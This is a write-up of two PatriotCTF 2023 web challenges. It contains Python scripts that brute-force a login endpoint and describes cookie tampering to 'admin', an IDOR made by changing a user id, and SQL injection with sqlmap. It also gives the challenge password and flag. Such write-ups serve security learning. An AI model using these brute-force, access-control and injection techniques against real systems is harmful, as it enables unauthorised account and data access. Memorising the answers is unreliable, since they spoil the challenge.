# PatriotCTF 2023
## Checkmate

At first glance we have a login form challenge that does not provide its source code, so we check the client-side code with view-source:
```
function checkName(name){
    var check = name.split("").reverse().join("");
    return check === "uyjnimda" ? !0 : !1;
}
function checkLength(pwd){
    return (password.length % 6 === 0 )? !0:!1;
}
function checkValidity(password){
    const arr = Array.from(password).map(ok);
    function ok(e){
        if (e.charCodeAt(0)<= 122 && e.charCodeAt(0) >=97 ){
            return e.charCodeAt(0);
        }
    }
    let sum = 0;
    for (let i = 0; i < arr.length; i+=6){
        var add = arr[i] & arr[i + 2];
        var or = arr[i + 1] | arr[i + 4];
        var xor = arr[i + 3] ^ arr[i + 5];
        if (add === 0x60 && or === 0x61 && xor === 0x6) sum += add + or - xor;
    }
    return sum === 0xbb ? !0 : !1;
}
// /check.php
var btn = document.getElementsByClassName('btn-1')[0];
btn.addEventListener('click',(e)=>{
    e.preventDefault();
    var nam = document.getElementById('name').value;
    if(!(checkName(nam))){
        alert('Incorrect Name! 😥😥')
    }
    else{
        alert('Correct Name! 🙂🙂')
    }
    var pwd = document.getElementById('password').value;
    if(!checkValidity(pwd) && !checkLength(pwd)){
        alert('Incorrect Password! 😥😥')
    }
    else{
        alert('Correct Password! 🙂🙂')
    }
});
```
It seems like the username is ```adminjyu``` (the reverse of ```uyjnimda```), but where is the password? There is a ```checkValidity``` function, and it seems the password has to get past it. Okay, let's write a piece of code that generates passwords meeting the requirements of this function.
```
import itertools
import requests

def check_validity(password):
    # Python port of checkValidity(): keep only the lowercase letters a-z
    arr = [ord(char) for char in password if 97 <= ord(char) <= 122]
    sum_value = 0
    for i in range(0, len(arr), 6):
        add = arr[i] & arr[i + 2]
        or_op = arr[i + 1] | arr[i + 4]
        xor = arr[i + 3] ^ arr[i + 5]
        if add == 0x60 and or_op == 0x61 and xor == 0x6:
            sum_value += add + or_op - xor
    return sum_value == 0xbb

# Iterate over all 6-character lowercase combinations from 'a' to 'z'
# (the first character is fixed to "a" here)
charset = 'abcdefghijklmnopqrstuvwxyz'
for i, j, k, v, a in itertools.product(charset, repeat=5):
    password = "a" + i + j + k + v + a
    if check_validity(password):
        r = requests.post("http://chal.pctf.competitivecyber.club:9096/check.php", data={"password": password})
        if "incorrect password" not in r.text:
            print(password)
```
However, the number of passwords that satisfy the check is very large, and it is difficult for us to brute-force the password. Suddenly an idea popped into my head: does it have anything to do with the author or not? So I changed the code a little bit.
```
import itertools
import requests

def check_validity(password):
    # Python port of checkValidity(): keep only the lowercase letters a-z
    arr = [ord(char) for char in password if 97 <= ord(char) <= 122]
    sum_value = 0
    for i in range(0, len(arr), 6):
        add = arr[i] & arr[i + 2]
        or_op = arr[i + 1] | arr[i + 4]
        xor = arr[i + 3] ^ arr[i + 5]
        if add == 0x60 and or_op == 0x61 and xor == 0x6:
            sum_value += add + or_op - xor
    return sum_value == 0xbb

# Iterate over all 6-character lowercase combinations from 'a' to 'z'
# (the first character is fixed to "s" here)
charset = 'abcdefghijklmnopqrstuvwxyz'
for i, j, k, v, a in itertools.product(charset, repeat=5):
    password = "s" + i + j + k + v + a
    if check_validity(password):
        r = requests.post("http://chal.pctf.competitivecyber.club:9096/check.php", data={"password": password})
        if "incorrect password" not in r.text:
            print(r.text)
            print(password)
            break  # stop at the first password the server accepts
```
Yeah, the password is ```sadsau``` and we got the flag.
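
Added example (not part of the original write-up): each of the three conditions in ```checkValidity``` ties together exactly one pair of positions, so the 6-letter passwords the client-side check accepts can be built pair by pair instead of scanning all 26^6 strings. It assumes a single 6-character lowercase password; the helper names are illustrative and nothing here contacts the server.

```python
from itertools import product
from string import ascii_lowercase

CODES = [ord(c) for c in ascii_lowercase]  # 0x61..0x7a


def pairs(op, target):
    """All ordered pairs of lowercase letters (x, y) with op(x, y) == target."""
    return [(chr(x), chr(y)) for x in CODES for y in CODES if op(x, y) == target]


# checkValidity() couples the six positions only in three independent pairs.
AND_PAIRS = pairs(lambda x, y: x & y, 0x60)  # positions 0 and 2
OR_PAIRS = pairs(lambda x, y: x | y, 0x61)   # positions 1 and 4
XOR_PAIRS = pairs(lambda x, y: x ^ y, 0x06)  # positions 3 and 5


def candidates(first=None):
    """Yield each 6-letter string that passes the check, optionally fixing char 0."""
    for (p0, p2), (p1, p4), (p3, p5) in product(AND_PAIRS, OR_PAIRS, XOR_PAIRS):
        if first is None or p0 == first:
            yield p0 + p1 + p2 + p3 + p4 + p5


def passes_check(password):
    """Direct port of the page's check for one 6-letter block (cross-check only)."""
    a = [ord(c) for c in password]
    return (a[0] & a[2], a[1] | a[4], a[3] ^ a[5]) == (0x60, 0x61, 0x06)


if __name__ == "__main__":
    print("pairs per constraint:", len(AND_PAIRS), len(OR_PAIRS), len(XOR_PAIRS))
    print("accepted by the client-side check:", sum(1 for _ in candidates()))
    print("of those starting with 's':", sum(1 for _ in candidates("s")))
```

The OR condition leaves a single choice, so positions 1 and 4 are always ```a```; the client-side check narrows the space but cannot single out the real password, which only the server knows.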

## One-for-all

I found the cookie value ```name=kiran```.
So what will happen if I switch it to ```admin```?


Continuing to search, I found the endpoint ```user?id=1```

Hmm, maybe IDOR. Let's change it to ```0```.

Yeah, we have the last part of the flag.
Let's come back to the primary endpoint. We have a search form with a ```username``` parameter. SQLi??? I tried sqlmap and, boom, I guessed correctly: we have the third part of the flag.

```secretsforyou```: the second part of the flag is here, isn't it???
Let's try this and, boom, we have all parts of the flag.

Flag is ```PCTF{Hang_l00s3_and_Adm1t_ev3rtH1nG}```